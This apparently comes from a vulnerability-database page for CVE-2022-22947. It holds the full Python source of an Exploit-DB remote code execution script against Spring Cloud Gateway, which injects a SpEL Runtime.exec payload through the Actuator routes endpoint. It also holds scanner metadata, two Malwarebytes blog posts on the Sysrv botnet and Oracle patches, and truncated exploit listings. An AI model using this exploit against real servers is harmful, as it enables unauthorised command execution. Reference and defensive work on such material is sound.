DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:50799", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)", "description": "", "published": "2022-03-07T00:00:00", "modified": "2022-03-07T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.exploit-db.com/exploits/50799", "reporter": "Carlos E. Vieira", "references": [], "cvelist": ["2022-22947", "CVE-2022-22947"], "immutableFields": [], "lastseen": "2022-03-17T19:38:06", "viewCount": 118, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2022-22947"]}, {"type": "github", "idList": ["GHSA-3GX9-37WW-9QW6"]}, {"type": "githubexploit", "idList": ["21A6C8CA-CA60-5265-8DE4-CD23E0ADB7B3", "453E372C-9914-57AC-8703-E5C770B9BA54", "461FCF6D-F08B-5C1B-8AA0-0280EF31F86E", "4E9E5EA5-ED60-5372-A45E-E4EB3EACD761", "73395497-EF2F-5E2B-B145-700BEECCF730", "94FA0473-BF7E-567A-BCBB-3DAD20F38627", "BAD2432C-C81D-5EF9-865B-2F4E12B34558", "C4845BA2-1E07-5E0D-AFF4-D608A325EB8B", "D8833A47-C03D-5D09-A449-DF19AB0A9258", "EF9B393E-84B6-5A0D-B8D2-6759E5970758", "FF2EF58E-53AA-5B60-9EA1-4B5C29647395"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166219"]}, {"type": "zdt", "idList": ["1337DAY-ID-37446"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-22947"]}, {"type": "githubexploit", "idList": ["21A6C8CA-CA60-5265-8DE4-CD23E0ADB7B3", "453E372C-9914-57AC-8703-E5C770B9BA54", "461FCF6D-F08B-5C1B-8AA0-0280EF31F86E", "4CF56666-BB73-546A-960C-A8AF10581233", "4E9E5EA5-ED60-5372-A45E-E4EB3EACD761", "5CD875BA-A337-5F27-A564-14CED5C59575", "5DE1B404-0368-5986-856A-306EA0FE0C09", "6D6C4503-DBCD-574F-AFFF-A5B58CC302A1", "7072D83E-3183-5CFC-ABEB-1C5F5932A217", "73395497-EF2F-5E2B-B145-700BEECCF730", "8E7595A3-22D3-53BC-A49E-8C148D00701A", "94FA0473-BF7E-567A-BCBB-3DAD20F38627", "958E6CA0-04A6-50FD-B7DC-4BC25760440E", "9ABC13CF-FB35-5B18-B3C4-C40087AA9CA9", "B0B4203D-0831-5405-9970-9B8EEE171BE6", "B9F78DFB-D2B3-54BE-AF98-69D2F32FC6C6", "BAD2432C-C81D-5EF9-865B-2F4E12B34558", "CC545F18-210E-5AB5-A927-503D6F3EC956", "D8833A47-C03D-5D09-A449-DF19AB0A9258", "E899CC4B-A3FD-5288-BB62-A4201F93FDCC", "EE6F9847-0C12-588E-BA63-6DD573963EFC", "EF9B393E-84B6-5A0D-B8D2-6759E5970758", "F6DAC821-341C-5097-BC37-E8180E188563", "FD75018B-E9E5-5053-8E81-F0E287C5C60F", "FF2EF58E-53AA-5B60-9EA1-4B5C29647395"]}], "rev": 4}, "score": {"value": 6.2, "vector": "NONE"}, "vulnersScore": 6.2}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/50799", "sourceData": "# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\r\n# Google Dork: N/A\r\n# Date: 03/03/2022\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://spring.io/\r\n# Software Link: https://spring.io/projects/spring-cloud-gateway\r\n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1\r\n# Tested on: 3.1.0\r\n# CVE : CVE-2022-22947\r\n\r\nimport random\r\nimport string\r\nimport requests\r\nimport json\r\nimport sys\r\nimport urllib.parse\r\nimport base64\r\n\r\nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}\r\nproxies = {\r\n 'http': 'http://172.29.32.1:8081',\r\n 'https': 'http://172.29.32.1:8081',\r\n}\r\nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\r\n\r\ndef exploit(url, command):\r\n \r\n payload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"}\r\n \r\n commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')\r\n\r\n rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)\r\n if(rbase.status_code == 201):\r\n print(\"[+] Stage deployed to /actuator/gateway/routes/\"+id)\r\n print(\"[+] Executing command...\")\r\n r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)\r\n if(r.status_code == 200):\r\n print(\"[+] getting result...\")\r\n r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\r\n if(r.status_code == 200):\r\n get_response = r.json()\r\n clean(url, id)\r\n return get_response['filters'][0].split(\"'\")[1]\r\n else:\r\n print(\"[-] Error: Invalid response\")\r\n clean(url, id)\r\n exit(1)\r\n else:\r\n clean(url, id)\r\n print(\"[-] Error executing command\")\r\n\r\n \r\ndef clean(url, id):\r\n remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\r\n if(remove.status_code == 200):\r\n print(\"[+] Stage removed!\")\r\n else:\r\n print(\"[-] Error: Fail to remove stage\")\r\n\r\ndef banner():\r\n print(\"\"\"\r\n ###################################################\r\n # #\r\n # Exploit for CVE-2022-22947 #\r\n # - Carlos Vieira (Crowsec) #\r\n # #\r\n # Usage: #\r\n # python3 exploit.py <url> <command> #\r\n # #\r\n # Example: #\r\n # python3 exploit.py http://localhost:8080 'id' #\r\n # #\r\n ###################################################\r\n \"\"\")\r\n\r\ndef main():\r\n banner()\r\n if len(sys.argv) != 3:\r\n print(\"[-] Error: Invalid arguments\")\r\n print(\"[-] Usage: python3 exploit.py <url> <command>\")\r\n exit(1)\r\n else:\r\n url = sys.argv[1]\r\n command = sys.argv[2]\r\n print(exploit(url, command))\r\nif __name__ == '__main__':\r\n main()", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"nessus": [{"lastseen": "2022-03-31T19:19:26", "description": "In Spring Cloud Gateway versions prior to 3.1.1 and 3.0.7, applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker can craft a malicious request that could allow arbitrary remote execution on the remote host.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-03-24T00:00:00", "type": "nessus", "title": "Spring Cloud Gateway < 3.0.7 / 3.1.x < 3.1.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-25T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_113169", "href": "https://www.tenable.com/plugins/was/113169", "sourceData": "No source data", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-05-18T15:03:46", "description": "In a [Twitter thread](<https://twitter.com/MsftSecIntel/status/1525158219206860801>), the Microsoft Security Intelligence team have revealed new information about the latest versions of the Sysrv botnet.\n\nThe variant they focused on uses a range of known exploits for vulnerabilities in web apps and databases to install cryptocurrency miners on both Windows and Linux systems.\n\n## Background\n\nThe Sysrv botnet first received [attention](<https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/>) at the end of 2020 because at the time it was one of the rare malware binaries written in Golang (aka GO). Since then the botnet has evolved, gained new features, and changed its behavior. One of the advantages of the Golang language for malware authors is that it allows them to create multi-platform malware\u2014the same malware binaries can be used against Windows and Linux machines.\n\nThe latest Sysrv variant scans the Internet for web servers that have security holes offering opportunities such as path traversal, remote file disclosure, and arbitrary file download bugs. Really, any vulnerability that can be exploited to infect the machines.\n\nOnce it has gained a foothold and the bot malware is running on a compromised system it deploys a Monero cryptocurrency miner.\n\n## The favorite cryptocurrency\n\nThe most popular cryptocurrency for attackers to mine is Monero. Monero is a cryptocurrency designed for privacy, promising \u201call the benefits of a decentralized cryptocurrency, without any of the typical privacy concessions\u201d.\n\nNo cryptocurrency is anonymous, as many people think, but there are other reasons why cryptojackers favor Monero:\n\n * Many cryptomining algorithms run significantly better on ASICs or GPUs, but Monero mining algorithms run better on CPUs, which matches what the cryptojacker can expect to find in a containerized environment.\n * Like Bitcoin, Monero is one of the better known cryptocurrencies and therefore is expected to hold its value. That&#x27;s a big perk given the unrest in cryptocurrency markets at the time of writing.\n\nWith cryptocurrencies, users hide behind a pseudonym, like one or more wallet IDs. Their activities can be tracked\u2014forever\u2014so keeping their identity secret depends on how well they can separate their real identity from their wallet IDs.\n\n## Linux malware\n\nWhile Linux malware was almost unheard of a few years ago, a couple of factors have \u201chelped\u201d the development of malware that targets Linux based systems. One is the development of languages that enable the creation of multiplatform malware like Golang. Another is the usage of Linux as the go-to operating system for many IoT devices.\n\nIoT malware has matured over the years and has become popular, especially among botnets. With billions of Internet-connected devices like cars, household appliances, surveillance cameras, and [network devices](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) online, IoT devices are a very large bullseye for botnet malware.\n\nThe number of malware infections targeting Linux devices [rose by 35%](<https://www.bleepingcomputer.com/news/security/linux-malware-sees-35-percent-growth-during-2021/>) in 2021, most commonly to recruit IoT devices for [distributed denial of service (DDoS) attacks](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>). And [around 95% of web servers](<https://webtribunal.net/blog/linux-statistics/#gref>) run on Linux.\n\n## Vulnerabilities\n\nLike many other botnets, Sysrv weaponizes bugs in WordPress plugins and in the Spring Framework. It can rifle through WordPress files on compromised machines to take control of web server software. According to Microsoft:\n\n> &quot;A new behavior observed in Sysrv-K is that it scans for WordPress configuration files and their backups to retrieve database credentials, which it uses to gain control of the web server.&quot;\n\nThe latest Sysrv variant also scans for Secure Shell (SSH) keys, IP addresses, and host names on infected machines so that it can use this information to spread via SSH connections. SSH keys are an access credential used in the SSH protocol and are foundational to modern Infrastructure-as-a-Service platforms such as AWS, Google Cloud, and Azure.\n\nAnother vulnerability the botnet uses is [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). Some Spring cloud gateway version applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\n## Development\n\nThe botnet malware starts with a simple script file that deploys modules of exploits against potentially vulnerable targets. Not only do the developers constantly add new exploits to the code, they keep updating the code. If the exploits aren&#x27;t successful, the developers get rid of them. Ever since the first appearance of the Sysrv botnet, the threat actors have released new scripts almost monthly.\n\n## Mitigation\n\nMost of the vulnerabilities that the Sysrv botnet uses have been patched, so an effective [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy can be a big help in keeping these miners off your systems.\n\nAnother strategy to looks at is whether all the servers that are at risk need to be Internet-facing. In some cases it may be better to take them offline.\n\nDon\u2019t forget to equip your servers with [anti-malware protection](<https://www.malwarebytes.com/business/edr/server-security>). The time that you could rest assured that your Linux server would be safe is unfortunately over.\n\nSafeguard your credentials and make sure that [multi-factor authentication (MFA)](<https://blog.malwarebytes.com/glossary/multi-factor-authentication-mfa/>) is in place for your important assets.\n\nStay safe, everyone!\n\nThe post [Sysrv botnet is out to mine Monero on your Windows and Linux servers](<https://blog.malwarebytes.com/botnets/2022/05/sysrv-botnet-is-out-to-mine-monero-on-your-windows-and-linux-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-18T12:55:00", "type": "malwarebytes", "title": "Sysrv botnet is out to mine Monero on your Windows and Linux servers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-18T12:55:00", "id": "MALWAREBYTES:A4F71EAE9519BD2DCD54B442CF67088A", "href": "https://blog.malwarebytes.com/botnets/2022/05/sysrv-botnet-is-out-to-mine-monero-on-your-windows-and-linux-servers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:28:46", "description": "Oracle has issued a Critical Patch Update which contains 520 new security patches across various product families. A few of these updates may need your urgent attention if you are a user of the affected product.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that look most urgent.\n\n## Oracle Communications Applications\n\nThe update contains 39 new security patches for Oracle Communications Applications. 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials.\n\n[**CVE-2022-21431**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21431>) is a vulnerability in the Connection Manager component of the Oracle Communications Billing and Revenue Management product and it has the maximum [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 10 out of 10. Supported versions that are affected by this flaw are 12.0.0.4 and 12.0.0.5.\n\n[**CVE-2022-23305**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23305>) is a Log4j vulnerability with a CVSS score of 9.8. It affects the Oracle Communications Messaging Server and allows attackers to manipulate a database by entering SQL strings into input fields or headers. (Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.) The same Log4j vulnerability affects the Cartridge Deployer Tool component of Oracle Communications Network Integrity and the Logging component of Oracle Communications Unified Inventory Management. It also affects several components of Oracle Fusion Middleware.\n\n[**CVE-2022-23990**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23990>) is a vulnerability in the user interface (LibExpat) component of the Oracle Communications MetaSolv Solution, and it also has a seriously high CVSS score of 9.8. LibExpat versions before 2.4.4 have an integer overflow in the `doProlog` function that allows an attacker to inject an unsigned integer, leading to a crash or a denial of service.\n\n## Oracle Blockchain Platform\n\nThe update contains 15 new security patches for Oracle Blockchain Platform. 14 of these vulnerabilities may be remotely exploitable without authentication.\n\n[**CVE-2021-23017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23017>) is a [security issue in nginx resolver](<https://support.f5.com/csp/article/K12331123>) with a CVSS score of 9.8. It could allow an attacker who is able to forge UDP packets from the DNS server to cause a 1-byte memory overwrite.\n\n## Oracle GoldenGate\n\nThe update contains 5 new security patches plus additional third-party patches for Oracle GoldenGate. 4 of these vulnerabilities may be remotely exploitable without authentication.\n\n[**CVE-2021-26291**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26291>) is a security issue in Apache Maven with a CVSS score if 9.1. it affects the Oracle GoldenGate Big Data and Application Adapters. Apache Maven will follow repositories that are defined in a dependency\u2019s Project Object Model (pom), which may be unknown to users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository.\n\n## Oracle Communications\n\nThe update contains 149 new security patches plus additional third party patches noted below for Oracle Communications. 98 of these vulnerabilities may be remotely exploitable without authentication.\n\n**[CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)** is another vulnerability with a CVSS score of 10. It is a vulnerability in Spring Cloud Gateway that affects Oracle Communications Cloud Native Core Network Exposure Function and Oracle Communications Cloud Native Core Network Slice Selection Function. In Spring Cloud Gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.\n\n## Oracle Java SE\n\nThe update contains 7 new security patches for Oracle Java SE. All of these vulnerabilities may be remotely exploitable without authentication.\n\n[**CVE-2022-21449**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449>) is a vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE with a CVSS score of 7.5. The 7.5 is a very low score due to the wide range of impacts on different functionality in an access management context. This vulnerability applies to Windows systems only, but an attacker can trivially and completely bypass them if your server is running any Java 15, 16, 17, or 18 version before the April 2022 Critical Patch Update. An elaborate analysis of this vulnerability was [published by ForgeRock](<https://backstage.forgerock.com/knowledge/kb/article/a90257583>).\n\n## Mitigation\n\nFor a complete list of the security vulnerabilities have a look at the [Oracle security alerts page](<https://www.oracle.com/security-alerts/cpuapr2022.html>). Several of the discussed vulnerabilities in this Patch Update are vulnerabilities in third-party components which you may have patched earlier, but it\u2019s definitely worth looking into.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update security patches as soon as possible. You can follow the links in the Patch Availability Document column on the [Oracle page](<https://www.oracle.com/security-alerts/cpuapr2022.html>) to access the documentation for patch availability information and installation instructions.\n\nStay safe, everyone!\n\nThe post [Oracle releases massive Critical Patch Update containing 520 security patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/oracle-releases-massive-critical-patch-update-containing-520-security-patches/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T14:53:54", "type": "malwarebytes", "title": "Oracle releases massive Critical Patch Update containing 520 security patches", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23017", "CVE-2021-26291", "CVE-2022-21431", "CVE-2022-21449", "CVE-2022-22947", "CVE-2022-23305", "CVE-2022-23990"], "modified": "2022-04-20T14:53:54", "id": "MALWAREBYTES:0A61417A438C7DDFAF7749BDD909CF11", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/oracle-releases-massive-critical-patch-update-containing-520-security-patches/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-04T17:48:12", "description": "# CVE-2022-22947\n\u8fd0\u884c: CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T08:50:13", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-04T14:44:21", "id": "8CC9F057-0254-57E7-A1D3-905863289BDA", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T10:42:47", "description": "## \u6f0f\u6d1e\u7b80\u4ecb\r\nSpring Cloud Gateway \u662f Spring Cloud \u7684\u4e00\u4e2a\u5168\u65b0\u9879\u76ee\uff0c\u8be5\u9879\u76ee\u662f\u57fa\u4e8e Spri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T23:37:20", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-09T06:00:29", "id": "339D1CBF-E58E-5E4D-B5CF-25DA36057634", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-29T14:15:39", "description": "# CVE-2022-22947\npoc for CVE-2022-22947 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T12:43:53", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-29T12:21:01", "id": "A1211768-5E91-56CF-ABBE-375C101C8987", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T20:15:47", "description": "# CVE-2022-22947 memshell\n###\u6b64\u811a\u672c\u4e0d\u5b8c\u5584,\u4ec5\u4f5c\u5b66\u4e60\u7528\u9014,\u8bf7\u52ff\u975e\u6cd5\u4f7f\u7528\n\n\n\u57fa\u4e8e [c0ny1](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T07:17:17", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-16T16:31:59", "id": "3754EBB9-751D-5EC2-A94B-4926B171EA05", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T10:59:09", "description": "# Spring-Cloud-Gateway-CVE-2022-22947\n\n\nSpring Cloud Gateway\u8fdc\u7a0b\u4ee3\u7801...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-08T09:52:23", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-14T09:22:52", "id": "EA6CBE17-9E5A-5E96-8381-75C6EA75423B", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T10:59:23", "description": "# Spring-Cloud-Gateway-CVE-2022-22947\n\n\nSpring Cloud Gateway\u8fdc\u7a0b\u4ee3\u7801...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 